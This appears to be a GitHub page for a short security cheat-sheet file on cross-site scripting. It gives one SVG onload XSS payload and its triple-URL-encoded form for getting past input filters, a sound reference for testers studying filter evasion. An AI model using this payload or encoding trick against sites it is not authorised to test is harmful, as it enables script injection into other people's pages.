Skip to content

Latest commit

 

History

History
14 lines (12 loc) · 299 Bytes

Cross-Site-Scripting.md

File metadata and controls

14 lines (12 loc) · 299 Bytes

Cross Site Scripting

Triple URL Encoding

  • Encode the payload thrice using URL encoding.

Restricted:

"><svg onload=confirm(‘XSS’)>

Bypassed:

%252522%25253E%25253Csvg%252520onload%25253Dconfirm%252528%2525E2%252580%252598XSS%2525E2%252580%252599%252529%25253E